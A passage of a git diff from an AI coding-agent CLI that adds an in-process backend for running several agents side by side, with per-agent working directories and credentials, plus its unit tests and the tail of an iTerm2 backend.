this.agentOrder.length) % this.agentOrder.length; + this.switchTo(this.agentOrder[prevIndex]!); + } + + getActiveAgentId(): string | null { + return this.activeAgentId; + } + + // ─── Screen Capture ───────────────────────────────────────── + + getActiveSnapshot(): AnsiOutput | null { + // iTerm2 manages rendering — snapshots not supported + return null; + } + + getAgentSnapshot( + _agentId: string, + _scrollOffset: number = 0, + ): AnsiOutput | null { + return null; + } + + getAgentScrollbackLength(_agentId: string): number { + return 0; + } + + // ─── Input ────────────────────────────────────────────────── + + forwardInput(data: string): boolean { + if (!this.activeAgentId) return false; + return this.writeToAgent(this.activeAgentId, data); + } + + writeToAgent(agentId: string, data: string): boolean { + const session = this.sessions.get(agentId); + if (!session || session.status !== 'running') return false; + itermSendText(session.sessionId, data).catch((e) => + debugLogger.error(`Failed to send text to agent "${agentId}": ${e}`), + ); + return true; + } + + // ─── Resize ───────────────────────────────────────────────── + + resizeAll(_cols: number, _rows: number): void { + // iTerm2 manages pane sizes automatically + } + + getAttachHint(): string | null { + // iTerm2 panes are visible directly, no attach needed + return null; + } + + // ─── Private ──────────────────────────────────────────────── + + /** + * Build the shell command with exit marker wrapping. + * + * The command is wrapped so that its exit code is written to a temp file + * when it completes. This allows the backend to detect agent exit via + * file polling, since iTerm2 `write text` runs commands inside a shell + * (the shell stays alive after the command exits). + */ + private buildShellCommand( + config: AgentSpawnConfig, + exitMarkerPath: string, + ): string { + const envParts: string[] = []; + if (config.env) { + for (const [key, value] of Object.entries(config.env)) { + if (!VALID_ENV_KEY.test(key)) { + throw new Error( + `Invalid environment variable name: "${key}". Names must match /^[A-Za-z_][A-Za-z0-9_]*$/.`, + ); + } + envParts.push(`${key}=${shellQuote(value)}`); + } + } + + const cmdParts = [ + shellQuote(config.command), + ...config.args.map(shellQuote), + ]; + + // Build: cd && [env K=V] command args; echo $? > + const parts = [`cd ${shellQuote(config.cwd)}`]; + if (envParts.length > 0) { + parts.push(`env ${envParts.join(' ')} ${cmdParts.join(' ')}`); + } else { + parts.push(cmdParts.join(' ')); + } + + const mainCmd = parts.join(' && '); + // Write exit code to a temp file first, then atomically rename it + // to the marker path. This prevents the polling loop from reading + // a partially-written file. + const tmpMarker = shellQuote(exitMarkerPath + '.tmp'); + const finalMarker = shellQuote(exitMarkerPath); + return `${mainCmd}; echo $? > ${tmpMarker} && mv ${tmpMarker} ${finalMarker}`; + } + + private allExited(): boolean { + if (this.pendingSpawns > 0) return false; + if (this.sessions.size === 0) return true; + for (const session of this.sessions.values()) { + if (session.status === 'running') return false; + } + return true; + } + + private startExitPolling(): void { + if (this.exitPollTimer) return; + + this.exitPollTimer = setInterval(() => { + void this.pollExitStatus(); + }, EXIT_POLL_INTERVAL_MS); + this.exitPollTimer.unref(); + } + + private stopExitPolling(): void { + if (this.exitPollTimer) { + clearInterval(this.exitPollTimer); + this.exitPollTimer = null; + } + } + + private async pollExitStatus(): Promise { + for (const agent of this.sessions.values()) { + if (agent.status !== 'running') continue; + + try { + const content = await fs.readFile(agent.exitMarkerPath, 'utf8'); + const exitCode = parseInt(content.trim(), 10); + agent.status = 'exited'; + agent.exitCode = isNaN(exitCode) ? 1 : exitCode; + + debugLogger.info( + `Agent "${agent.agentId}" exited with code ${agent.exitCode}`, + ); + + this.onExitCallback?.(agent.agentId, agent.exitCode, null); + } catch { + // File doesn't exist yet — command still running + } + } + + if (this.allExited()) { + this.stopExitPolling(); + } + } +} + +/** Regex for valid POSIX environment variable names */ +const VALID_ENV_KEY = /^[A-Za-z_][A-Za-z0-9_]*$/; + +/** + * Simple shell quoting for building command strings. + * Wraps value in single quotes, escaping any internal single quotes. + */ +function shellQuote(value: string): string { + return `'${value.replace(/'/g, "'\\''")}'`; +} diff --git a/packages/core/src/agents/backends/InProcessBackend.test.ts b/packages/core/src/agents/backends/InProcessBackend.test.ts new file mode 100644 index 000000000..83bf1caca --- /dev/null +++ b/packages/core/src/agents/backends/InProcessBackend.test.ts @@ -0,0 +1,564 @@ +/** + * @license + * Copyright 2025 Qwen + * SPDX-License-Identifier: Apache-2.0 + */ + +import { describe, it, expect, vi, beforeEach } from 'vitest'; +import { InProcessBackend } from './InProcessBackend.js'; +import { DISPLAY_MODE } from './types.js'; +import type { AgentSpawnConfig } from './types.js'; +import { AgentCore } from '../runtime/agent-core.js'; +import { createContentGenerator } from '../../core/contentGenerator.js'; + +// Mock createContentGenerator to avoid real API client setup +const mockContentGenerator = { + generateContentStream: vi.fn(), +}; +vi.mock('../../core/contentGenerator.js', () => ({ + createContentGenerator: vi.fn().mockResolvedValue({ + generateContentStream: vi.fn(), + }), +})); + +// Mock AgentCore and AgentInteractive to avoid real model calls +vi.mock('../runtime/agent-core.js', () => ({ + AgentCore: vi.fn().mockImplementation(() => ({ + subagentId: 'mock-id', + name: 'mock-agent', + eventEmitter: { + on: vi.fn(), + off: vi.fn(), + emit: vi.fn(), + }, + stats: { + start: vi.fn(), + getSummary: vi.fn().mockReturnValue({}), + }, + createChat: vi.fn().mockResolvedValue({}), + prepareTools: vi.fn().mockReturnValue([]), + runReasoningLoop: vi.fn().mockResolvedValue({ + text: 'Done', + terminateMode: null, + turnsUsed: 1, + }), + getEventEmitter: vi.fn().mockReturnValue({ + on: vi.fn(), + off: vi.fn(), + emit: vi.fn(), + }), + getExecutionSummary: vi.fn().mockReturnValue({}), + })), +})); + +function createMockToolRegistry() { + return { + getFunctionDeclarations: vi.fn().mockReturnValue([]), + getAllTools: vi.fn().mockReturnValue([]), + getAllToolNames: vi.fn().mockReturnValue([]), + registerTool: vi.fn(), + copyDiscoveredToolsFrom: vi.fn(), + stop: vi.fn().mockResolvedValue(undefined), + }; +} + +function createMockConfig() { + const registry = createMockToolRegistry(); + return { + getModel: vi.fn().mockReturnValue('test-model'), + getToolRegistry: vi.fn().mockReturnValue(registry), + getSessionId: vi.fn().mockReturnValue('test-session'), + getWorkingDir: vi.fn().mockReturnValue('/tmp'), + getTargetDir: vi.fn().mockReturnValue('/tmp'), + createToolRegistry: vi.fn().mockResolvedValue(createMockToolRegistry()), + getContentGenerator: vi.fn().mockReturnValue(mockContentGenerator), + getContentGeneratorConfig: vi.fn().mockReturnValue({ + model: 'test-model', + authType: 'openai', + apiKey: 'parent-key', + baseUrl: 'https://parent.example.com', + }), + getAuthType: vi.fn().mockReturnValue('openai'), + } as never; +} + +function createSpawnConfig(agentId: string): AgentSpawnConfig { + return { + agentId, + command: 'node', + args: [], + cwd: '/tmp', + inProcess: { + agentName: `Agent ${agentId}`, + initialTask: 'Do something', + runtimeConfig: { + promptConfig: { systemPrompt: 'You are a helpful assistant.' }, + modelConfig: { model: 'test-model' }, + runConfig: { max_turns: 10 }, + }, + }, + }; +} + +describe('InProcessBackend', () => { + let backend: InProcessBackend; + + beforeEach(() => { + backend = new InProcessBackend(createMockConfig()); + }); + + it('should have IN_PROCESS type', () => { + expect(backend.type).toBe(DISPLAY_MODE.IN_PROCESS); + }); + + it('should init without error', async () => { + await expect(backend.init()).resolves.toBeUndefined(); + }); + + it('should throw when spawning without inProcess config', async () => { + const config: AgentSpawnConfig = { + agentId: 'test', + command: 'node', + args: [], + cwd: '/tmp', + }; + + await expect(backend.spawnAgent(config)).rejects.toThrow( + 'InProcessBackend requires inProcess config', + ); + }); + + it('should spawn an agent with inProcess config', async () => { + await backend.init(); + await backend.spawnAgent(createSpawnConfig('agent-1')); + + expect(backend.getActiveAgentId()).toBe('agent-1'); + expect(backend.getAgent('agent-1')).toBeDefined(); + }); + + it('should set first spawned agent as active', async () => { + await backend.init(); + await backend.spawnAgent(createSpawnConfig('agent-1')); + await backend.spawnAgent(createSpawnConfig('agent-2')); + + expect(backend.getActiveAgentId()).toBe('agent-1'); + }); + + it('should navigate between agents', async () => { + await backend.init(); + await backend.spawnAgent(createSpawnConfig('agent-1')); + await backend.spawnAgent(createSpawnConfig('agent-2')); + await backend.spawnAgent(createSpawnConfig('agent-3')); + + expect(backend.getActiveAgentId()).toBe('agent-1'); + + backend.switchToNext(); + expect(backend.getActiveAgentId()).toBe('agent-2'); + + backend.switchToNext(); + expect(backend.getActiveAgentId()).toBe('agent-3'); + + // Wraps around + backend.switchToNext(); + expect(backend.getActiveAgentId()).toBe('agent-1'); + + backend.switchToPrevious(); + expect(backend.getActiveAgentId()).toBe('agent-3'); + }); + + it('should switch to a specific agent', async () => { + await backend.init(); + await backend.spawnAgent(createSpawnConfig('agent-1')); + await backend.spawnAgent(createSpawnConfig('agent-2')); + + backend.switchTo('agent-2'); + expect(backend.getActiveAgentId()).toBe('agent-2'); + }); + + it('should forward input to active agent', async () => { + await backend.init(); + await backend.spawnAgent(createSpawnConfig('agent-1')); + + const result = backend.forwardInput('hello'); + expect(result).toBe(true); + }); + + it('should return false for forwardInput with no active agent', () => { + expect(backend.forwardInput('hello')).toBe(false); + }); + + it('should write to specific agent', async () => { + await backend.init(); + await backend.spawnAgent(createSpawnConfig('agent-1')); + + expect(backend.writeToAgent('agent-1', 'hello')).toBe(true); + expect(backend.writeToAgent('nonexistent', 'hello')).toBe(false); + }); + + it('should return null for screen capture methods', async () => { + await backend.init(); + await backend.spawnAgent(createSpawnConfig('agent-1')); + + expect(backend.getActiveSnapshot()).toBeNull(); + expect(backend.getAgentSnapshot('agent-1')).toBeNull(); + expect(backend.getAgentScrollbackLength('agent-1')).toBe(0); + }); + + it('should return null for attach hint', () => { + expect(backend.getAttachHint()).toBeNull(); + }); + + it('should stop a specific agent', async () => { + await backend.init(); + await backend.spawnAgent(createSpawnConfig('agent-1')); + + const agent = backend.getAgent('agent-1'); + expect(agent).toBeDefined(); + + backend.stopAgent('agent-1'); + // Agent should eventually reach cancelled state + }); + + it('should stop all agents', async () => { + await backend.init(); + await backend.spawnAgent(createSpawnConfig('agent-1')); + await backend.spawnAgent(createSpawnConfig('agent-2')); + + backend.stopAll(); + // Both agents should be aborted + }); + + it('should cleanup all agents', async () => { + await backend.init(); + await backend.spawnAgent(createSpawnConfig('agent-1')); + + await backend.cleanup(); + + expect(backend.getActiveAgentId()).toBeNull(); + expect(backend.getAgent('agent-1')).toBeUndefined(); + }); + + it('should fire exit callback when agent completes', async () => { + await backend.init(); + + const exitCallback = vi.fn(); + backend.setOnAgentExit(exitCallback); + + await backend.spawnAgent(createSpawnConfig('agent-1')); + + // The mock agent stays idle after processing initialTask. + // Trigger a graceful shutdown to make it complete. + const agent = backend.getAgent('agent-1'); + expect(agent).toBeDefined(); + await agent!.shutdown(); + + // Wait for the exit callback to fire + await vi.waitFor(() => { + expect(exitCallback).toHaveBeenCalledWith( + 'agent-1', + expect.any(Number), + null, + ); + }); + }); + + it('should pass per-agent cwd to AgentCore via config proxy', async () => { + const parentConfig = createMockConfig(); + const backendWithParentCwd = new InProcessBackend(parentConfig); + await backendWithParentCwd.init(); + + const agentCwd = '/worktree/agent-1'; + const config = createSpawnConfig('agent-1'); + config.cwd = agentCwd; + + await backendWithParentCwd.spawnAgent(config); + + const MockAgentCore = AgentCore as unknown as ReturnType; + const lastCall = MockAgentCore.mock.calls.at(-1); + expect(lastCall).toBeDefined(); + + // Second arg is the runtime context (Config) + const agentContext = lastCall![1] as { + getWorkingDir: () => string; + getTargetDir: () => string; + getToolRegistry: () => unknown; + }; + expect(agentContext.getWorkingDir()).toBe(agentCwd); + expect(agentContext.getTargetDir()).toBe(agentCwd); + expect(agentContext.getToolRegistry()).toBeDefined(); + }); + + it('should propagate runConfig limits to AgentInteractive', async () => { + await backend.init(); + + const config = createSpawnConfig('agent-1'); + config.inProcess!.runtimeConfig.runConfig = { + max_turns: 5, + max_time_minutes: 10, + }; + + await backend.spawnAgent(config); + + const agent = backend.getAgent('agent-1'); + expect(agent).toBeDefined(); + expect(agent!.config.maxTurnsPerMessage).toBe(5); + expect(agent!.config.maxTimeMinutesPerMessage).toBe(10); + }); + + it('should default limits to undefined when runConfig omits them', async () => { + await backend.init(); + + const config = createSpawnConfig('agent-1'); + config.inProcess!.runtimeConfig.runConfig = {}; + + await backend.spawnAgent(config); + + const agent = backend.getAgent('agent-1'); + expect(agent).toBeDefined(); + expect(agent!.config.maxTurnsPerMessage).toBeUndefined(); + expect(agent!.config.maxTimeMinutesPerMessage).toBeUndefined(); + }); + + it('should give each agent its own cwd even when sharing a backend', async () => { + await backend.init(); + + const config1 = createSpawnConfig('agent-1'); + config1.cwd = '/worktree/agent-1'; + const config2 = createSpawnConfig('agent-2'); + config2.cwd = '/worktree/agent-2'; + + await backend.spawnAgent(config1); + await backend.spawnAgent(config2); + + const MockAgentCore = AgentCore as unknown as ReturnType; + const calls = MockAgentCore.mock.calls; + + const ctx1 = calls.at(-2)![1] as { + getWorkingDir: () => string; + getTargetDir: () => string; + }; + const ctx2 = calls.at(-1)![1] as { + getWorkingDir: () => string; + getTargetDir: () => string; + }; + + expect(ctx1.getWorkingDir()).toBe('/worktree/agent-1'); + expect(ctx1.getTargetDir()).toBe('/worktree/agent-1'); + expect(ctx2.getWorkingDir()).toBe('/worktree/agent-2'); + expect(ctx2.getTargetDir()).toBe('/worktree/agent-2'); + }); + + it('should throw when spawning a duplicate agent ID', async () => { + await backend.init(); + await backend.spawnAgent(createSpawnConfig('agent-1')); + + await expect( + backend.spawnAgent(createSpawnConfig('agent-1')), + ).rejects.toThrow('Agent "agent-1" already exists.'); + }); + + it('should fire exit callback with code 1 when start() throws', async () => { + // Make createChat throw for this test + const MockAgentCore = AgentCore as unknown as ReturnType; + MockAgentCore.mockImplementationOnce(() => ({ + subagentId: 'mock-id', + name: 'mock-agent', + eventEmitter: { + on: vi.fn(), + off: vi.fn(), + emit: vi.fn(), + }, + stats: { + start: vi.fn(), + getSummary: vi.fn().mockReturnValue({}), + }, + createChat: vi.fn().mockRejectedValue(new Error('Auth failed')), + prepareTools: vi.fn().mockReturnValue([]), + getEventEmitter: vi.fn().mockReturnValue({ + on: vi.fn(), + off: vi.fn(), + emit: vi.fn(), + }), + getExecutionSummary: vi.fn().mockReturnValue({}), + })); + + await backend.init(); + + const exitCallback = vi.fn(); + backend.setOnAgentExit(exitCallback); + + // spawnAgent should NOT throw — it catches the error internally + await expect( + backend.spawnAgent(createSpawnConfig('agent-fail')), + ).resolves.toBeUndefined(); + + // Exit callback should have been fired with exit code 1 + expect(exitCallback).toHaveBeenCalledWith('agent-fail', 1, null); + }); + + it('should return true immediately from waitForAll after cleanup', async () => { + await backend.init(); + await backend.spawnAgent(createSpawnConfig('agent-1')); + + await backend.cleanup(); + + // waitForAll should return immediately after cleanup + const result = await backend.waitForAll(5000); + expect(result).toBe(true); + }); + + describe('chat history', () => { + it('should pass chatHistory to AgentInteractive config', async () => { + await backend.init(); + + const chatHistory = [ + { role: 'user' as const, parts: [{ text: 'prior question' }] }, + { role: 'model' as const, parts: [{ text: 'prior answer' }] }, + ]; + const config = createSpawnConfig('agent-1'); + config.inProcess!.chatHistory = chatHistory; + + await backend.spawnAgent(config); + + const agent = backend.getAgent('agent-1'); + expect(agent).toBeDefined(); + expect(agent!.config.chatHistory).toEqual(chatHistory); + }); + + it('should leave chatHistory undefined when not provided', async () => { + await backend.init(); + await backend.spawnAgent(createSpawnConfig('agent-1')); + + const agent = backend.getAgent('agent-1'); + expect(agent).toBeDefined(); + expect(agent!.config.chatHistory).toBeUndefined(); + }); + }); + + describe('auth isolation', () => { + it('should create per-agent ContentGenerator when authOverrides is provided', async () => { + await backend.init(); + + const config = createSpawnConfig('agent-1'); + config.inProcess!.authOverrides = { + authType: 'anthropic', + apiKey: 'agent-key-123', + baseUrl: 'https://agent.example.com', + }; + + await backend.spawnAgent(config); + + const mockCreate = createContentGenerator as ReturnType; + expect(mockCreate).toHaveBeenCalledWith( + expect.objectContaining({ + authType: 'anthropic', + apiKey: 'agent-key-123', + baseUrl: 'https://agent.example.com', + model: 'test-model', + }), + expect.anything(), + ); + }); + + it('should override getContentGenerator on per-agent config', async () => { + const agentGenerator = { generateContentStream: vi.fn() }; + const mockCreate = createContentGenerator as ReturnType; + mockCreate.mockResolvedValueOnce(agentGenerator); + + await backend.init(); + + const config = createSpawnConfig('agent-1'); + config.inProcess!.authOverrides = { + authType: 'anthropic', + apiKey: 'agent-key', + }; + + await backend.spawnAgent(config); + + const MockAgentCore = AgentCore as unknown as ReturnType; + const lastCall = MockAgentCore.mock.calls.at(-1); + const agentContext = lastCall![1] as { + getContentGenerator: () => unknown; + getAuthType: () => string | undefined; + getModel: () => string; + }; + + expect(agentContext.getContentGenerator()).toBe(agentGenerator); + expect(agentContext.getAuthType()).toBe('anthropic'); + }); + + it('should not create per-agent ContentGenerator without authOverrides', async () => { + const mockCreate = createContentGenerator as ReturnType; + mockCreate.mockClear(); + + await backend.init(); + await backend.spawnAgent(createSpawnConfig('agent-1')); + + expect(mockCreate).not.toHaveBeenCalled(); + }); + + it('should fall back to parent ContentGenerator if per-agent creation fails', async () => { + const mockCreate = createContentGenerator as ReturnType; + mockCreate.mockRejectedValueOnce(new Error('Auth failed')); + + await backend.init(); + + const config = createSpawnConfig('agent-1'); + config.inProcess!.authOverrides = { + authType: 'anthropic', + apiKey: 'bad-key', + }; + + // Should not throw — falls back gracefully + await expect(backend.spawnAgent(config)).resolves.toBeUndefined(); + + const MockAgentCore = AgentCore as unknown as ReturnType; + const lastCall = MockAgentCore.mock.calls.at(-1); + const agentContext = lastCall![1] as { + getContentGenerator: () => unknown; + }; + + // Falls back to parent's content generator + expect(agentContext.getContentGenerator()).toBe(mockContentGenerator); + }); + + it('should give different agents different ContentGenerators', async () => { + const gen1 = { generateContentStream: vi.fn() }; + const gen2 = { generateContentStream: vi.fn() }; + const mockCreate = createContentGenerator as ReturnType; + mockCreate.mockResolvedValueOnce(gen1).mockResolvedValueOnce(gen2); + + await backend.init(); + + const config1 = createSpawnConfig('agent-1'); + config1.inProcess!.authOverrides = { + authType: 'openai', + apiKey: 'key-1', + baseUrl: 'https://api1.example.com', + }; + const config2 = createSpawnConfig('agent-2'); + config2.inProcess!.authOverrides = { + authType: 'anthropic', + apiKey: 'key-2', + baseUrl: 'https://api2.example.com', + }; + + await backend.spawnAgent(config1); + await backend.spawnAgent(config2); + + const MockAgentCore = AgentCore as unknown as ReturnType; + const calls = MockAgentCore.mock.calls; + + const ctx1 = calls.at(-2)![1] as { + getContentGenerator: () => unknown; + }; + const ctx2 = calls.at(-1)![1] as { + getContentGenerator: () => unknown; + }; + + expect(ctx1.getContentGenerator()).toBe(gen1); + expect(ctx2.getContentGenerator()).toBe(gen2); + expect(ctx1.getContentGenerator()).not.toBe(ctx2.getContentGenerator()); + }); + }); +}); diff --git a/packages/core/src/agents/backends/InProcessBackend.ts b/packages/core/src/agents/backends/InProcessBackend.ts new file mode 100644 index 000000000..c53892cbc --- /dev/null +++ b/packages/core/src/agents/backends/InProcessBackend.ts @@ -0,0 +1,472 @@ +/** + * @license + * Copyright 2025 Qwen + * SPDX-License-Identifier: Apache-2.0 + */ + +/** + * @fileoverview InProcessBackend — Backend implementation that runs agents + * in the current process using AgentInteractive instead of PTY subprocesses. + * + * This enables Arena to work without tmux or any external terminal multiplexer. + */ + +import { createDebugLogger } from '../../utils/debugLogger.js'; +import type { Config } from '../../config/config.js'; +import { + type AuthType, + type ContentGenerator, + type ContentGeneratorConfig, + createContentGenerator, +} from '../../core/contentGenerator.js'; +import { AUTH_ENV_MAPPINGS } from '../../models/constants.js'; +import { AgentStatus, isTerminalStatus } from '../runtime/agent-types.js'; +import { AgentCore } from '../runtime/agent-core.js'; +import { AgentEventEmitter } from '../runtime/agent-events.js'; +import { ContextState } from '../runtime/agent-headless.js'; +import { AgentInteractive } from '../runtime/agent-interactive.js'; +import type { + Backend, + AgentSpawnConfig, + AgentExitCallback, + InProcessSpawnConfig, +} from './types.js'; +import { DISPLAY_MODE } from './types.js'; +import type { AnsiOutput } from '../../utils/terminalSerializer.js'; +import { WorkspaceContext } from '../../utils/workspaceContext.js'; +import { FileDiscoveryService } from '../../services/fileDiscoveryService.js'; +import type { ToolRegistry } from '../../tools/tool-registry.js'; + +const debugLogger = createDebugLogger('IN_PROCESS_BACKEND'); + +/** + * InProcessBackend runs agents in the current Node.js process. + * + * Instead of spawning PTY subprocesses, it creates AgentCore + AgentInteractive + * instances that execute in-process. Screen capture returns null (the UI reads + * messages directly from AgentInteractive). + */ +export class InProcessBackend implements Backend { + readonly type = DISPLAY_MODE.IN_PROCESS; + + private readonly runtimeContext: Config; + private readonly agents = new Map(); + private readonly agentRegistries: ToolRegistry[] = []; + private readonly agentOrder: string[] = []; + private activeAgentId: string | null = null; + private exitCallback: AgentExitCallback | null = null; + /** Whether cleanup() has been called */ + private cleanedUp = false; + + constructor(runtimeContext: Config) { + this.runtimeContext = runtimeContext; + } + + // ─── Backend Interface ───────────────────────────────────── + + async init(): Promise { + debugLogger.info('InProcessBackend initialized'); + } + + async spawnAgent(config: AgentSpawnConfig): Promise { + const inProcessConfig = config.inProcess; + if (!inProcessConfig) { + throw new Error( + `InProcessBackend requires inProcess config for agent ${config.agentId}`, + ); + } + + if (this.agents.has(config.agentId)) { + throw new Error(`Agent "${config.agentId}" already exists.`); + } + + const { promptConfig, modelConfig, runConfig, toolConfig } = + inProcessConfig.runtimeConfig; + + const eventEmitter = new AgentEventEmitter(); + + // Build a per-agent runtime context with isolated working directory, + // target directory, workspace context, tool registry, and (optionally) + // a dedicated ContentGenerator for per-agent auth isolation. + const agentContext = await createPerAgentConfig( + this.runtimeContext, + config.cwd, + inProcessConfig.runtimeConfig.modelConfig.model, + inProcessConfig.authOverrides, + ); + + this.agentRegistries.push(agentContext.getToolRegistry()); + + const core = new AgentCore( + inProcessConfig.agentName, + agentContext, + promptConfig, + modelConfig, + runConfig, + toolConfig, + eventEmitter, + ); + + const interactive = new AgentInteractive( + { + agentId: config.agentId, + agentName: inProcessConfig.agentName, + initialTask: inProcessConfig.initialTask, + maxTurnsPerMessage: runConfig.max_turns, + maxTimeMinutesPerMessage: runConfig.max_time_minutes, + chatHistory: inProcessConfig.chatHistory, + }, + core, + ); + + this.agents.set(config.agentId, interactive); + this.agentOrder.push(config.agentId); + + // Set first agent as active + if (this.activeAgentId === null) { + this.activeAgentId = config.agentId; + } + + try { + const context = new ContextState(); + await interactive.start(context); + + // Watch for completion and fire exit callback — but only for + // truly terminal statuses. IDLE means the agent is still alive + // and can accept follow-up messages. + void interactive.waitForCompletion().then(() => { + const status = interactive.getStatus(); + if (!isTerminalStatus(status)) { + return; + } + const exitCode = + status === AgentStatus.COMPLETED + ? 0 + : status === AgentStatus.FAILED + ? 1 + : null; + this.exitCallback?.(config.agentId, exitCode, null); + }); + + debugLogger.info(`Spawned in-process agent: ${config.agentId}`); + } catch (error) { + debugLogger.error( + `Failed to start in-process agent "${config.agentId}":`, + error, + ); + this.exitCallback?.(config.agentId, 1, null); + } + } + + stopAgent(agentId: string): void { + const agent = this.agents.get(agentId); + if (agent) { + agent.abort(); + debugLogger.info(`Stopped agent: ${agentId}`); + } + } + + stopAll(): void { + for (const agent of this.agents.values()) { + agent.abort(); + } + debugLogger.info('Stopped all in-process agents'); + } + + async cleanup(): Promise { + this.cleanedUp = true; + + for (const agent of this.agents.values()) { + agent.abort(); + } + // Wait for loops to settle, but cap at 3s so CLI exit isn't blocked + // if an agent's reasoning loop doesn't terminate promptly after abort. + const CLEANUP_TIMEOUT_MS = 3000; + const promises = Array.from(this.agents.values()).map((a) => + a.waitForCompletion().catch(() => {}), + ); + let timerId: ReturnType; + const timeout = new Promise((resolve) => { + timerId = setTimeout(resolve, CLEANUP_TIMEOUT_MS); + }); + await Promise.race([Promise.allSettled(promises), timeout]); + clearTimeout(timerId!); + + // Stop per-agent tool registries so tools like TaskTool can release + // listeners registered on shared managers (e.g. SubagentManager). + for (const registry of this.agentRegistries) { + await registry.stop().catch(() => {}); + } + this.agentRegistries.length = 0; + + this.agents.clear(); + this.agentOrder.length = 0; + this.activeAgentId = null; + debugLogger.info('InProcessBackend cleaned up'); + } + + setOnAgentExit(callback: AgentExitCallback): void { + this.exitCallback = callback; + } + + async waitForAll(timeoutMs?: number): Promise { + if (this.cleanedUp) return true; + + const promises = Array.from(this.agents.values()).map((a) => + a.waitForCompletion(), + ); + + if (timeoutMs === undefined) { + await Promise.allSettled(promises); + return true; + } + + let timerId: ReturnType; + const timeout = new Promise<'timeout'>((resolve) => { + timerId = setTimeout(() => resolve('timeout'), timeoutMs); + }); + + const result = await Promise.race([ + Promise.allSettled(promises).then(() => 'done' as const), + timeout, + ]); + + clearTimeout(timerId!); + return result === 'done'; + } + + // ─── Navigation ──────────────────────────────────────────── + + switchTo(agentId: string): void { + if (this.agents.has(agentId)) { + this.activeAgentId = agentId; + } + } + + switchToNext(): void { + this.activeAgentId = this.navigate(1); + } + + switchToPrevious(): void { + this.activeAgentId = this.navigate(-1); + } + + getActiveAgentId(): string | null { + return this.activeAgentId; + } + + // ─── Screen Capture (no-op for in-process) ───────────────── + + getActiveSnapshot(): AnsiOutput | null { + return null; + } + + getAgentSnapshot( + _agentId: string, + _scrollOffset?: number, + ): AnsiOutput | null { + return null; + } + + getAgentScrollbackLength(_agentId: string): number { + return 0; + } + + // ─── Input ───────────────────────────────────────────────── + + forwardInput(data: string): boolean { + if (!this.activeAgentId) return false; + return this.writeToAgent(this.activeAgentId, data); + } + + writeToAgent(agentId: string, data: string): boolean { + const agent = this.agents.get(agentId); + if (!agent) return false; + + agent.enqueueMessage(data); + return true; + } + + // ─── Resize (no-op) ─────────────────────────────────────── + + resizeAll(_cols: number, _rows: number): void { + // No terminals to resize in-process + } + + // ─── External Session ────────────────────────────────────── + + getAttachHint(): string | null { + return null; + } + + // ─── Extra: Direct Access ────────────────────────────────── + + /** + * Get an AgentInteractive instance by agent ID. + * Used by ArenaManager for direct event subscription. + */ + getAgent(agentId: string): AgentInteractive | undefined { + return this.agents.get(agentId); + } + + // ─── Private ─────────────────────────────────────────────── + + private navigate(direction: 1 | -1): string | null { + if (this.agentOrder.length === 0) return null; + if (!this.activeAgentId) return this.agentOrder[0] ?? null; + + const currentIndex = this.agentOrder.indexOf(this.activeAgentId); + if (currentIndex === -1) return this.agentOrder[0] ?? null; + + const nextIndex = + (currentIndex + direction + this.agentOrder.length) % + this.agentOrder.length; + return this.agentOrder[nextIndex] ?? null; + } +} + +/** + * Create a per-agent Config that delegates to the shared base Config but + * overrides key methods to provide per-agent isolation: + * + * - `getWorkingDir()` / `getTargetDir()` → agent's worktree cwd + * - `getWorkspaceContext()` → WorkspaceContext rooted at agent's cwd + * - `getFileService()` → FileDiscoveryService rooted at agent's cwd + * (so .qwenignore checks resolve against the agent's worktree) + * - `getToolRegistry()` → per-agent tool registry with core tools bound to + * the agent Config (so tools resolve paths against the agent's worktree) + * - `getContentGenerator()` / `getContentGeneratorConfig()` / `getAuthType()` + * → per-agent ContentGenerator when `authOverrides` is provided, enabling + * agents to target different model providers in the same Arena session + * + * Uses prototypal delegation so all other Config methods/properties resolve + * against the original instance transparently. + */ +async function createPerAgentConfig( + base: Config, + cwd: string, + modelId?: string, + authOverrides?: InProcessSpawnConfig['authOverrides'], +): Promise { + // eslint-disable-next-line @typescript-eslint/no-explicit-any + const override = Object.create(base) as any; + + override.getWorkingDir = () => cwd; + override.getTargetDir = () => cwd; + override.getProjectRoot = () => cwd; + + const agentWorkspace = new WorkspaceContext(cwd); + override.getWorkspaceContext = () => agentWorkspace; + + const agentFileService = new FileDiscoveryService(cwd); + override.getFileService = () => agentFileService; + + // Build a per-agent tool registry: core tools are constructed with + // the per-agent Config so they resolve paths against cwd. Discovered + // (MCP/command) tools are copied from the parent registry as-is. + const agentRegistry: ToolRegistry = await override.createToolRegistry( + undefined, + { skipDiscovery: true }, + ); + agentRegistry.copyDiscoveredToolsFrom(base.getToolRegistry()); + override.getToolRegistry = () => agentRegistry; + + // Build a per-agent ContentGenerator when auth overrides are provided. + // This enables Arena agents to use different providers (OpenAI, Anthropic, + // Gemini, etc.) than the parent process. + if (authOverrides?.authType) { + try { + const agentGeneratorConfig = buildAgentContentGeneratorConfig( + base, + modelId, + authOverrides, + ); + const agentGenerator = await createContentGenerator( + agentGeneratorConfig, + override as Config, + ); + override.getContentGenerator = (): ContentGenerator => agentGenerator; + override.getContentGeneratorConfig = (): ContentGeneratorConfig => + agentGeneratorConfig; + override.getAuthType = (): AuthType | undefined => + agentGeneratorConfig.authType; + override.getModel = (): string => agentGeneratorConfig.model; + + debugLogger.info( + `Created per-agent ContentGenerator: authType=${authOverrides.authType}, model=${agentGeneratorConfig.model}`, + ); + } catch (error) { + debugLogger.error( + 'Failed to create per-agent ContentGenerator, falling back to parent:', + error, + ); + } + } + + return override as Config; +} + +/** + * Build a ContentGeneratorConfig for a per-agent ContentGenerator. + * Inherits operational settings (timeout, retries, proxy, sampling, etc.) + * from the parent's config and overlays the agent-specific auth fields. + * + * For cross-provider agents the parent's API key / base URL are invalid, + * so we resolve credentials from the provider-specific environment + * variables (e.g. ANTHROPIC_API_KEY, ANTHROPIC_BASE_URL). This mirrors + * what a PTY subprocess does during its own initialization. + */ +function buildAgentContentGeneratorConfig( + base: Config, + modelId: string | undefined, + authOverrides: NonNullable, +): ContentGeneratorConfig { + const parentConfig = base.getContentGeneratorConfig(); + const sameProvider = authOverrides.authType === parentConfig.authType; + + const resolvedApiKey = resolveCredentialField( + authOverrides.apiKey, + sameProvider ? parentConfig.apiKey : undefined, + authOverrides.authType, + 'apiKey', + ); + + const resolvedBaseUrl = resolveCredentialField( + authOverrides.baseUrl, + sameProvider ? parentConfig.baseUrl : undefined, + authOverrides.authType, + 'baseUrl', + ); + + return { + ...parentConfig, + model: modelId ?? parentConfig.model, + authType: authOverrides.authType as AuthType, + apiKey: resolvedApiKey, + baseUrl: resolvedBaseUrl, + }; +} + +/** + * 